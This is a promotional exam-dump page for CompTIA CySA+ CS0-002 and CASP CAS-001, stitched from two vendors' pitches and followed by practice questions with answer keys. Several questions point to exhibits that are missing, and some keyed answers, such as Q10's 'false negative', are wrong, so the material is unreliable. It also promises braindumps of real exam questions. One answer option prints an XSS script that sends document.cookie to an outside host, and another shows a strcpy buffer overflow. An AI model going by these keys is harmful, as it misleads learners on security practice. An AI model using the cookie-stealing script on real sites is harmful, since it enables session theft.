Cert4sure’s CompTIA CS0-002 exam study guide fully follows the full set of exam topics of the new CySA + CS0-002 exam. Due to the lack of learning resources for the CS0-002 exam, we have compiled and shared CS0-002 learning materials that are beneficial to all of us, including the Latest CS0-002 practice questions, latest CS0-002 pdf dumps, Recommended websites https://www.pass4itsure.com/cs0-002.html and purchase discount codes.
Candidates preparing to take the CYSA+ (CS0-001) exam should not worry, because the English version will be retired on October 21, 2020, while the simple Chinese and Japanese versions will be retired on April 23, 2021.
Q&As: About the Pass4itsure CompTIA CySA+ CS0-002 exam dumps
How many questions in the real CS0-002 exam? There are 119 Q&As in our CompTIA CS0-002 real exam questions.
Can I get the updated version of CS0-002 real exam questions? Yes, from the date of your purchasing, you can get a FREE update of CompTIA CS0-002 real exam questions in ONE year.
Can I get a full refund if I fail the CS0-002 exam? Yes, if you fail the CS0-002 exam by using our CompTIA CompTIA CySA+ real exam questions, you can get a full refund.
Can I get a big discount if I buy many exams? The latest discount code “2020PASS” is provided below. Get 12% off!
Practice CS0-002 real questions: CompTIA Cybersecurity Analyst (CySA+)
QUESTION 1 A compliance officer of a large organization has reviewed the firm\\’s vendor management program but has discovered there are no controls defined to evaluate third-party risk or hardware source authenticity. The compliance officer wants to gain some level of assurance on a recurring basis regarding the implementation of controls by third parties. Which of the following would BEST satisfy the objectives defined by the compliance officer? (Choose two.) A. Executing vendor compliance assessments against the organization\\’s security controls B. Executing NDAs prior to sharing critical data with third parties C. Soliciting third-party audit reports on an annual basis D. Maintaining and reviewing the organizational risk assessment on a quarterly basis E. Completing a business impact assessment for all critical service providers F. Utilizing DLP capabilities at both the endpoint and perimeter levels Correct Answer: AE
QUESTION 2 An information security analyst observes anomalous behavior on the SCADA devices in a power plant. This behavior results in the industrial generators overheating and destabilizing the power supply. Which of the following would BEST identify potential indicators of compromise? A. Use Burp Suite to capture packets to the SCADA device\\’s IP. B. Use tcpdump to capture packets from the SCADA device IP. C. Use Wireshark to capture packets between SCADA devices and the management system. D. Use Nmap to capture packets from the management system to the SCADA devices. Correct Answer: C
QUESTION 3 A development team uses open-source software and follows an Agile methodology with two-week sprints. Last month, the security team filed a bug for an insecure version of a common library. The DevOps team updated the library on the server, and then the security team rescanned the server to verify it was no longer vulnerable. This month, the security team found the same vulnerability on the server. Which of the following should be done to correct the cause of the vulnerability? A. Deploy a WAF in front of the application. B. Implement a software repository management tool. C. Install a HIPS on the server. D. Instruct the developers to use input validation in the code. Correct Answer: B
QUESTION 4 An audit has revealed an organization is utilizing a large number of servers that are running unsupported operating systems. As part of the management response phase of the audit, which of the following would BEST demonstrate senior management is appropriately aware of and addressing the issue? A. Copies of prior audits that did not identify the servers as an issue B. Project plans relating to the replacement of the servers that were approved by management C. Minutes from meetings in which risk assessment activities addressing the servers were discussed D. ACLs from perimeter firewalls showing blocked access to the servers E. Copies of change orders relating to the vulnerable servers Correct Answer: C
QUESTION 5 A product manager is working with an analyst to design a new application that will perform as a data analytics platform and will be accessible via a web browser. The product manager suggests using a PaaS provider to host the application. Which of the following is a security concern when using a PaaS solution? A. The use of infrastructure-as-code capabilities leads to an increased attack surface. B. Patching the underlying application server becomes the responsibility of the client. C. The application is unable to use encryption at the database level. D. Insecure application programming interfaces can lead to data compromise. Correct Answer: B
QUESTION 6 A small electronics company decides to use a contractor to assist with the development of a new FPGA-based device. Several of the development phases will occur off-site at the contractor\\’s labs. Which of the following is the main concern a security analyst should have with this arrangement? A. Making multiple trips between development sites increases the chance of physical damage to the FPGAs. B. Moving the FPGAs between development sites will lessen the time that is available for security testing. C. Development phases occurring at multiple sites may produce change management issues. D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft. Correct Answer: D Reference: https://www.eetimes.com/how-to-protect-intellectual-property-in-fpgas-devices-part-1/#
QUESTION 7 A Chief Information Security Officer (CISO) is concerned the development team, which consists of contractors, has too much access to customer data. Developers use personal workstations, giving the company little to no visibility into the development activities. Which of the following would be BEST to implement to alleviate the CISO\\’s concern? A. DLP B. Encryption C. Test data D. NDA Correct Answer: A
QUESTION 8 Bootloader malware was recently discovered on several company workstations. All the workstations run Windows and are current models with UEFI capability. Which of the following UEFI settings is the MOST likely cause of the infections? A. Compatibility mode B. Secure boot mode C. Native mode D. Fast boot mode Correct Answer: A
QUESTION 9 A security analyst is reviewing packet captures from a system that was compromised. The system was already isolated from the network, but it did have network access for a few hours after being compromised. When viewing the capture in a packet analyzer, the analyst sees the following:
Which of the following can the analyst conclude? A. Malware is attempting to beacon to 128.50.100.3. B. The system is running a DoS attack against ajgidwle.com. C. The system is scanning ajgidwle.com for PII. D. Data is being exfiltrated over DNS. Correct Answer: C
QUESTION 10 A security analyst is reviewing vulnerability scan results and notices new workstations are being flagged as having outdated antivirus signatures. The analyst observes the following plugin output: Antivirus is installed on the remote host: Installation path: C:\Program Files\AVProduct\Win32\ Product Engine: 14.12.101 Engine Version: 3.5.71 Scanner does not currently have information about AVProduct version 3.5.71. It may no longer be supported. The engine version is out of date. The oldest supported version from the vendor is 4.2.11. The analyst uses the vendor\\’s website to confirm the oldest supported version is correct. Which of the following BEST describes the situation? A. This is a false positive, and the scanning plugin needs to be updated by the vendor. B. This is a true negative, and the new computers have the correct version of the software. C. This is a true positive, and the new computers were imaged with an old version of the software. D. This is a false negative, and the new computers need to be updated by the desktop team. Correct Answer: D
QUESTION 11 A security analyst is evaluating two vulnerability management tools for possible use in an organization. The analyst set up each of the tools according to the respective vendor\\’s instructions and generated a report of vulnerabilities that ran against the same target server. Tool A reported the following:
Which of the following BEST describes the method used by each tool? (Choose two.) A. Tool A is agent based. B. Tool A used fuzzing logic to test vulnerabilities. C. Tool A is unauthenticated. D. Tool B utilized machine learning technology. E. Tool B is agent based. F. Tool B is unauthenticated. Correct Answer: CE
QUESTION 12 A security technician is testing a solution that will prevent outside entities from spoofing the company\\’s email domain, which is comptia.org. The testing is successful, and the security technician is prepared to fully implement the solution. Which of the following actions should the technician take to accomplish this task? A. Add TXT @ “v=spf1 mx include:_spf.comptia.org -all” to the DNS record. B. Add TXT @ “v=spf1 mx include:_spf.comptia.org -all” to the email server. C. Add TXT @ “v=spf1 mx include:_spf.comptia.org +all” to the domain controller. D. Add TXT @ “v=spf1 mx include:_spf.comptia.org +all” to the web server. Correct Answer: A Reference: https://blog.finjan.com/email-spoofing
QUESTION 13 A security analyst reviews the following aggregated output from an Nmap scan and the border firewall ACL:
Which of the following should the analyst reconfigure to BEST reduce organizational risk while maintaining current functionality? A. PC1 B. PC2 C. Server1 D. Server2 E. Firewall Correct Answer: E
The new CompTIA CYSA+ (CS0-002) certification exam will take effect on April 21, 2020. This study guide shares the learning materials for the new exam CS0-002. Recommended websites https://www.pass4itsure.com/cs0-002.html CS0-002 dumps Q&As.
We at Flydumps CompTIA CAS-001 exam sample questions are IT. experts and are highly experienced in the field of exam dumps and study notes as our team is continuously working for the more accomplished CompTIA CAS-001 exam guide and test questions. At CompTIA CAS-001 exam sample questions Flydumps, all the necessary CompTIA CAS-001 exam guide is available which not only includes free CompTIA CAS-001 but it also contains CompTIA CAS-001 study guide and CompTIA CAS-001 practice exam.
QUESTION 26
A security administrator of a large private firm is researching and putting together a proposal to purchase an IPS. The specific IPS type has not been selected, and the security administrator needs to gather information from several vendors to determine a specific product. Which of the following documents would assist in choosing a specific brand and model?
A. RFC
B. RTO
C. RFQ
D. RFI
Correct Answer: D QUESTION 27
Wireless users are reporting issues with the company’s video conferencing and VoIP systems. The security administrator notices DOS attacks on the network that are affecting the company’s VoIP system (i.e. premature call drops and garbled call signals). The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DOS attacks on the network? (Select TWO).
A. Configure 802.11b on the network
B. Configure 802.1q on the network
C. Configure 802.11e on the network
D. Update the firewall managing the SIP servers
E. Update the HIDS managing the SIP servers
Correct Answer: CD QUESTION 28
A company has decided to use the SDLC for the creation and production of a new information system. The security administrator is training all users on how to protect company information while using the new system, along with being able to recognize social engineering attacks. Senior Management must also formally approve of the system prior to it going live. In which of the following phases would these security controls take place?
A. Operations and Maintenance
B. Implementation
C. Acquisition and Development
D. Initiation Correct Answer: B QUESTION 29
A company contracts with a third party to develop a new web application to process credit cards. Which of the following assessments will give the company the GREATEST level of assurance for the web application?
A. Social Engineering
B. Penetration Test
C. Vulnerability Assessment
D. Code Review Correct Answer: D QUESTION 30
As part of the testing phase in the SDLC, a software developer wants to verify that an application is properly handling user error exceptions. Which of the following is the BEST tool or process for the developer use?
A. SRTM review
B. Fuzzer
C. Vulnerability assessment
D. HTTP interceptor Correct Answer: B QUESTION 31
Which of the following is the MOST appropriate control measure for lost mobile devices?
A. Disable unnecessary wireless interfaces such as Bluetooth.
B. Reduce the amount of sensitive data stored on the device.
C. Require authentication before access is given to the device.
D. Require that the compromised devices be remotely wiped.
Correct Answer: D QUESTION 32
Which of the following is the MOST cost-effective solution for sanitizing a DVD with sensitive information on it?
A. Write over the data
B. Purge the data
C. Incinerate the DVD
D. Shred the DVD Correct Answer: D QUESTION 33
A network engineer at Company ABC observes the following raw HTTP request:
GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts&to_date=01- 01-0101&Run= Run&UserEntered=dsmith&SessionID=5f04189bc&from_date=31-10-2010&TypesEntered=1 HTTP/1.1
Host: test.example.net Accept: */* Accept-Language: en Connection: close Cookie: java14=1; java15=1; java16=1; js=1292192278001;
Which of the following should be the engineer’s GREATEST concern?
A. The HTTPS is not being enforced so the system is vulnerable.
B. The numerical encoding on the session ID is limited to hexadecimal characters, making it susceptible to a brute force attack.
C. Sensitive data is transmitted in the URL.
D. The dates entered are outside a normal range, which may leave the system vulnerable to a denial of service attack.
Correct Answer: C
QUESTION 34
Driven mainly by cost, many companies outsource computing jobs which require a large amount of processor cycles over a short duration to cloud providers. This allows the company to avoid a large investment in computing resources which will only be used for a short time.
Assuming the provisioned resources are dedicated to a single company, which of the following is the MAIN vulnerability associated with on-demand provisioning?
A. Traces of proprietary data which can remain on the virtual machine and be exploited
B. Remnants of network data from prior customers on the physical servers during a compute job
C. Exposure of proprietary data when in-transit to the cloud provider through IPSec tunnels
D. Failure of the de-provisioning mechanism resulting in excessive charges for the resources
Correct Answer: A
QUESTION 35
A security administrator needs a secure computing solution to use for all of the company’s security audit log storage, and to act as a central server to execute security functions from. Which of the following is the BEST option for the server in this scenario?
A. A hardened Red Hat Enterprise Linux implementation running a software firewall
B. Windows 7 with a secure domain policy and smartcard based authentication
C. A hardened bastion host with a permit all policy implemented in a software firewall
D. Solaris 10 with trusted extensions or SE Linux with a trusted policy
Correct Answer: D
QUESTION 36
After implementing port security, restricting all network traffic into and out of a network, migrating to IPv6, installing NIDS, firewalls, spam and application filters, a security administer is convinced that the network is secure. The administrator now focuses on securing the hosts on the network, starting with the servers.
Which of the following is the MOST complete list of end-point security software the administrator could plan to implement?
A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, two- factor authentication.
B. Anti-virus/spyware/spam software, as well as a host based IDS, firewall, and strong three- factor authentication.
C. Anti-malware/virus/spyware/spam software, as well as a host based firewall and biometric authentication.
D. Anti-malware/spam software, as well as a host based firewall and strong, three-factor authentication.
Correct Answer: A
QUESTION 37
A security architect is assigned to a major software development project. The software development team has a history of writing bug prone, inefficient code, with multiple security flaws in every release. The security architect proposes implementing secure coding standards to the project manager. The secure coding standards will contain detailed standards for:
A. error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems.
B. error prevention, requirements validation, memory use and reuse, commenting typical security problems, and testing code standards.
C. error elimination, trash collection, documenting race conditions, peer review, and typical security problems.
D. error handling, input validation, commenting, preventing typical security problems, managing customers, and documenting extra requirements.
Correct Answer: A
QUESTION 38
A number of security incidents have been reported involving mobile web-based code developed by a consulting company. Performing a root cause analysis, the security administrator of the consulting company discovers that the problem is a simple programming error that results in extra information being loaded into the memory when the proper format is selected by the user. After repeating the process several times, the security administrator is able to execute unintentional instructions through this method. Which of the following BEST describes the problem that is occurring, a good mitigation technique to use to prevent future occurrences, and why it a security concern?
A. Problem: Cross-site scripting Mitigation Technique. Input validation Security Concern: Decreases the company’s profits and cross-site scripting can enable malicious actors to compromise the confidentiality of network connections or interrupt the availability of the network.
B. Problem: Buffer overflow Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability buffer overflows and can enable malicious actors to compromise the confidentiality/availability of the data.
C. Problem: SQL injection Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability SQL injection and can enable malicious actors to compromise the confidentiality of data or interrupt the availability of a system.
D. Problem: Buffer overflow Mitigation Technique: Output validation Security Concern: Exposing the company to public scrutiny buffer overflows can enable malicious actors to interrupt the availability of a system.
Correct Answer: B QUESTION 39
A security administrator has been conducting a security assessment of Company XYZ for the past two weeks. All of the penetration tests and other assessments have revealed zero flaws in the systems at Company XYZ. However, Company XYZ reports that it has been the victim of numerous security incidents in the past six months. In each of these incidents, the criminals have managed to exfiltrate large volumes of data from the secure servers at the company. Which of the following techniques should the investigation team consider in the next phase of their assessment in hopes of uncovering the attack vector the criminals used?
A. Vulnerability assessment
B. Code review
C. Social engineering
D. Reverse engineering
Correct Answer: C
QUESTION 40
A security manager at Company ABC, needs to perform a risk assessment of a new mobile device which the Chief Information Officer (CIO) wants to immediately deploy to all employees in the company. The product is commercially available, runs a popular mobile operating system, and can connect to IPv6 networks wirelessly. The model the CIO wants to procure also includes the upgraded 160GB solid state hard drive. The producer of the device will not reveal exact numbers but experts estimate that over 73 million of the devices have been sold worldwide. Which of the following is the BEST list of factors the security manager should consider while performing a risk assessment?
A. Ability to remotely wipe the devices, apply security controls remotely, and encrypt the SSD; the track record of the vendor in publicizing and correcting security flaws in their products; predicted costs associated with maintaining, integrating and securing the devices.
B. Ability to remotely administer the devices, apply security controls remotely, and remove the SSD; the track record of the vendor in securely implementing IPv6 with IPSec; predicted costs associated with securing the devices.
C. Ability to remotely monitor the devices, remove security controls remotely, and decrypt the SSD; the track record of the vendor in publicizing and preventing security flaws in their products; predicted costs associated with maintaining, destroying and tracking the devices.
D. Ability to remotely sanitize the devices, apply security controls locally, encrypt the SSD; the track record of the vendor in adapting the open source operating system to their platform; predicted costs associated with inventory management, maintaining, integrating and securing the devices.
Correct Answer: A
QUESTION 41
A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysis regarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor who performed a security assessment of the system. The report details what seems to be a manageable volume of infrequently exploited security vulnerabilities. The likelihood of a malicious attacker exploiting one of the vulnerabilities is low; however, the director still has some reservations about approving the system because of which of the following?
A. The resulting impact of even one attack being realized might cripple the company financially.
B. Government health care regulations for the pharmaceutical industry prevent the director from approving a system with vulnerabilities.
C. The director is new and is being rushed to approve a project before an adequate assessment has been performed.
D. The director should be uncomfortable accepting any security vulnerabilities and should find time to correct them before the system is deployed.
Correct Answer: A
QUESTION 42
A small company has a network with 37 workstations, 3 printers, a 48 port switch, an enterprise class router, and a firewall at the boundary to the ISP. The workstations have the latest patches and all have up-to-date anti-virus software. User authentication is a two-factor system with fingerprint scanners and passwords. Sensitive data on each workstation is encrypted. The network is configured to use IPv4 and is a standard Ethernet network. The network also has a captive portal based wireless hot-spot to accommodate visitors. Which of the following is a problem with the security posture of this company?
A. No effective controls in place
B. No transport security controls are implemented
C. Insufficient user authentication controls are implemented
D. IPv6 is not incorporated in the network
Correct Answer: B
QUESTION 43
Statement: “The system shall implement measures to notify system administrators prior to a security incident occurring.”
Which of the following BEST restates the above statement to allow it to be implemented by a team of software developers?
A. The system shall cease processing data when certain configurable events occur.
B. The system shall continue processing in the event of an error and email the security administrator the error logs.
C. The system shall halt on error.
D. The system shall throw an error when specified incidents pass a configurable threshold.
Correct Answer: D
QUESTION 44
A corporate executive lost their smartphone while on an overseas business trip. The phone was equipped with file encryption and secured with a strong passphrase. The phone contained over 60GB of proprietary data. Given this scenario, which of the following is the BEST course of action?
A. File an insurance claim and assure the executive the data is secure because it is encrypted.
B. Immediately implement a plan to remotely wipe all data from the device.
C. Have the executive change all passwords and issue the executive a new phone.
D. Execute a plan to remotely disable the device and report the loss to the police.
Correct Answer: B
QUESTION 45
A user logs into domain A using a PKI certificate on a smartcard protected by an 8 digit PIN. The credential is cached by the authenticating server in domain A. Later, the user attempts to access a resource in domain B. This initiates a request to the original authenticating server to somehow attest to the resource server in the second domain that the user is in fact who they claim to be.
Which of the following is being described?
A. Authentication
B. Authorization
C. SAML
D. Kerberos
Correct Answer: C
QUESTION 46
A certain script was recently altered by the author to meet certain security requirements, and needs to be executed on several critical servers. Which of the following describes the process of ensuring that the script being used was not altered by anyone other than the author?
A. Digital encryption
B. Digital signing
C. Password entropy
D. Code signing
Correct Answer: D
QUESTION 47
A company has asked their network engineer to list the major advantages for implementing a virtual environment in regards to cost. Which of the following would MOST likely be selected?
A. Ease of patch testing
B. Reducing physical footprint
C. Reduced network traffic
D. Isolation of applications
Correct Answer: B
QUESTION 48
The security administrator has been tasked with providing a solution that would not only eliminate the need for physical desktops, but would also centralize the location of all desktop applications, without losing physical control of any network devices. Which of the following would the security manager MOST likely implement?
A. VLANs
B. VDI
C. PaaS
D. IaaS
Correct Answer: B
QUESTION 49
A company has decided to relocate and the security manager has been tasked to perform a site survey of the new location to help in the design of the physical infrastructure. The current location has video surveillance throughout the building and entryways.
The following requirements must be met:
Able to log entry of all employees in and out of specific areas
Access control into and out of all sensitive areas
Tailgating prevention
Which of the following would MOST likely be implemented to meet the above requirements and provide a secure solution? (Select TWO).
A. Discretionary Access control
B. Man trap
C. Visitor logs
D. Proximity readers
E. Motion detection sensors
Correct Answer: BD
Special CompTIA CAS-001 exam FLYDUMPS is designed according to the updated curriculum given by FLYDUMPS. This CompTIA CAS-001 exam highlights the most vital and anticipated contents regarding the test and exclude all of the unnecessary details. Thus, It provides a shortcut way and prevents you from over digesting the whole of CompTIA CAS-001 exam. Let FLYDUMPS to smooth your way and make your scores higher to get CompTIA CAS-001 test. And FLYDUMPS CompTIA CAS-001 exam are constantly updated to reflect the current CompTIA CAS-001 exam information. FLYDUMPS CompTIA CAS-001 exam updates are supplied free of charge to FLYDUMPS customers hereby becoming an investment rather than a disposable product.
Flydumps CompTIA CAS-001 material details are researched and created by the most professional certified authors who are regularly using current exams experience to create precise and logical dumps. You can get questions and answers from many other websites or books, but logic is the main key of success. And Flydumps will give you this key of success.
QUESTION 1
Which of the following attacks does Unicast Reverse Path Forwarding prevent?
A. Man in the Middle
B. ARP poisoning
C. Broadcast storm
D. IP Spoofing
Correct Answer: D QUESTION 2
Which of the following authentication types is used primarily to authenticate users through the use of tickets?
A. LDAP
B. RADIUS
C. TACACS+
D. Kerberos Correct Answer: D QUESTION 3
A security consultant is evaluating forms which will be used on a company website. Which of the following techniques or terms is MOST effective at preventing malicious individuals from successfully exploiting programming flaws in the website?
A. Anti-spam software
B. Application sandboxing
C. Data loss prevention
D. Input validation Correct Answer: D QUESTION 4
A security audit has uncovered that some of the encryption keys used to secure the company B2B financial transactions with its partners may be too weak. The security administrator needs to implement a process to ensure that financial transactions will not be compromised if a weak encryption key is found. Which of the following should the security administrator implement?
A. Entropy should be enabled on all SSLv2 transactions.
B. AES256-CBC should be implemented for all encrypted data.
C. PFS should be implemented on all VPN tunnels.
D. PFS should be implemented on all SSH connections.
Correct Answer: C QUESTION 5
A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data was found on a hidden directory within the hypervisor. Which of the following has MOST likely occurred?
A. A stolen two factor token and a memory mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token.
B. An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk.
C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access.
D. A virtual guest was left un-patched and an attacker was able to use a privilege escalation attack to gain unauthorized access. Correct Answer: C QUESTION 6
Company XYZ provides residential television cable service across a large region. The company’s board of directors is in the process of approving a deal with the following three companies:
A National landline telephone provider
A Regional wireless telephone provider
An international Internet service provider
The board of directors at Company XYZ wants to keep the companies and billing separated.
While the Chief Information Officer (CIO) at Company XYZ is concerned about the confidentiality of Company XYZ’s customer data and wants to share only minimal information about its customers for the purpose of accounting, billing, and customer authentication.
The proposed solution must use open standards and must make it simple and seamless for Company XYZ’s customers to receive all four services.
Which of the following solutions is BEST suited for this scenario?
A. All four companies must implement a TACACS+ web based single sign-on solution with associated captive portal technology.
B. Company XYZ must implement VPN and strict access control to allow the other three companies to access the internal LDAP.
C. Company XYZ needs to install the SP, while the partner companies need to install the WAYF portion of a Federated identity solution.
D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution. Correct Answer: D QUESTION 7
The security administrator at a bank is receiving numerous reports that customers are unable to login to the bank website. Upon further investigation, the security administrator discovers that the name associated with the bank website points to an unauthorized IP address.
Which of the following solutions will MOST likely mitigate this type of attack?
A. Security awareness and user training
B. Recursive DNS from the root servers
C. Configuring and deploying TSIG
D. Firewalls and IDS technologies
Correct Answer: C QUESTION 8
A security administrator has finished building a Linux server which will host multiple virtual machines through hypervisor technology. Management of the Linux server, including monitoring server performance, is achieved through a third party web enabled application installed on the Linux server. The security administrator is concerned about vulnerabilities in the web application that may allow an attacker to retrieve data from the virtual machines.
Which of the following will BEST protect the data on the virtual machines from an attack?
A. The security administrator must install the third party web enabled application in a chroot environment.
B. The security administrator must install a software firewall on both the Linux server and the virtual machines.
C. The security administrator must install anti-virus software on both the Linux server and the virtual machines.
D. The security administrator must install the data exfiltration detection software on the perimeter firewall. Correct Answer: A QUESTION 9
A breach at a government agency resulted in the public release of top secret information. The Chief Information Security Officer has tasked a group of security professionals to deploy a system which will protect against such breaches in the future.
Which of the following can the government agency deploy to meet future security needs?
A. A DAC which enforces no read-up, a DAC which enforces no write-down, and a MAC which uses an access matrix.
B. A MAC which enforces no write-up, a MAC which enforces no read-down, and a DAC which uses an ACL.
C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix.
D. A DAC which enforces no write-up, a DAC which enforces no read-down, and a MAC which uses an ACL. Correct Answer: C QUESTION 10
The internal auditor at Company ABC has completed the annual audit of the company’s financial system. The audit report indicates that the accounts receivable department has not followed proper record disposal procedures during a COOP/BCP tabletop exercise involving manual processing of financial transactions.
Which of the following should be the Information Security Officer’s (ISO’s) recommendation? (Select TWO).
A. Wait for the external audit results
B. Perform another COOP exercise
C. Implement mandatory training
D. Destroy the financial transactions
E. Review company procedures
Correct Answer: CE QUESTION 11
Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seeking sponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC’s network. Company ABC’s Chief Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development in the area.
Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection?
A. SLA
B. ISA
C. NDA
D. BPA
Correct Answer: B QUESTION 12
A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusion prevention system (IPS) capable of analyzing encrypted web transactions.
Which of the following should the analyst provide to the ISO to support the request? (Select TWO).
A. Emerging threat reports
B. Company attack tends
C. Request for Quote (RFQ)
D. Best practices
E. New technologies report Correct Answer: AB QUESTION 13
The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunch time. The company is considering the possibility of allowing access only through the company’s guest wireless network, which is logically separated from the internal research network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops.
Which of the following is the HIGHEST risk to the organization?
A. Employee’s professional reputation
B. Intellectual property confidentiality loss
C. Downloaded viruses on the company laptops
D. Workstation compromise affecting availability
Correct Answer: B
QUESTION 14
A security audit has uncovered a lack of security controls with respect to employees’ network account management. Specifically, the audit reveals that employee’s network accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of an employee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after a dismissed employee departs. Furthermore, 2% of the accounts are still active. Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings?
A. Review the HR termination process and ask the software developers to review the identity management code.
B. Enforce the company policy by conducting monthly account reviews of inactive accounts.
C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.
D. Update the company policy to account for delays and unforeseen situations in account deactivation.
Correct Answer: C
QUESTION 15
Which of the following is true about an unauthenticated SAMLv2 transaction?
A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.
B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format. The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access.
C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to the SP, which verifies the cookie and XHTML format for access.
D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then the browser asks the SP for a resource.
Correct Answer: A
QUESTION 16
A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs’ code is not prone to buffer and integer overflows. The ASIC technology is copyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well as testing by a third party.
Which of the following should be implemented in the SDLC to achieve these requirements?
A. Regression testing by the manufacturer and integration testing by the third party
B. User acceptance testing by the manufacturer and black box testing by the third party
C. Defect testing by the manufacturer and user acceptance testing by the third party
D. White box unit testing by the manufacturer and black box testing by the third party
Correct Answer: D
QUESTION 17
The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows file sharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course of action is to block the file sharing service across the organization by placing ACLs on the internal routers.
Which of the following should the security administrator do before applying the ACL?
A. Quickly research best practices with respect to stopping Conficker infections and implement the solution.
B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager.
C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise.
D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.
Correct Answer: D
QUESTION 18
A company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access must be locked down to only authorized personnel. The policy also dictates that only authorized external networks will be allowed to access certain internal resources.
Which of the following would MOST likely need to be implemented and configured on the company’s perimeter network to comply with the new security policy? (Select TWO).
A. VPN concentrator
B. Firewall
C. Proxy server
D. WAP
E. Layer 2 switch
Correct Answer: AB
QUESTION 19
Which of the following displays an example of a buffer overflow attack?
A. <SCRIPT> document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie </SCRIPT>
B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
C. #include char *code = “AAAABBBBCCCCDDD”; //including the character ‘\0’ size = 16 bytes void main() {char buf[8]; strcpy(buf, code);
}
D. <form action=”/cgi-bin/login” method=post> Username: <input type=text name=username> PassworD. <input type=password name=password> <input type=submit value=Login>
Correct Answer: C
QUESTION 20
Which of the following displays an example of a XSS attack?
A. <SCRIPT> document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie </SCRIPT>
B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
C. <form action=”/cgi-bin/login” method=post> Username: <input type=text name=username> PassworD. <input type=password name=password> <input type=submit value=Login>
D. #include char *code = “AAAABBBBCCCCDDD”; //including the character ‘\0’ size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }
Correct Answer: A
QUESTION 21
Several critical servers are unresponsive after an update was installed. Other computers that have not yet received the same update are operational, but are vulnerable to certain buffer overflow attacks. The security administrator is required to ensure all systems have the latest updates while minimizing any downtime.
Which of the following is the BEST risk mitigation strategy to use to ensure a system is properly updated and operational?
A. Distributed patch management system where all systems in production are patched as updates are released.
B. Central patch management system where all systems in production are patched by automatic updates as they are released.
C. Central patch management system where all updates are tested in a lab environment after being installed on a live production system.
D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.
Correct Answer: D
QUESTION 22
A business is currently in the process of upgrading its network infrastructure to accommodate a personnel growth of over fifty percent within the next six months. All preliminary planning has been completed and a risk assessment plan is being adopted to decide which security controls to put in place throughout each phase.
Which of the following risk responses is MOST likely being considered if the business is creating an SLA with a third party?
A. Accepting risk
B. Mitigating risk
C. Identifying risk
D. Transferring risk
Correct Answer: D
QUESTION 23
Which of the following must be taken into consideration for e-discovery purposes when a legal case is first presented to a company?
A. Data ownership on all files
B. Data size on physical disks
C. Data retention policies on only file servers
D. Data recovery and storage
Correct Answer: D
QUESTION 24
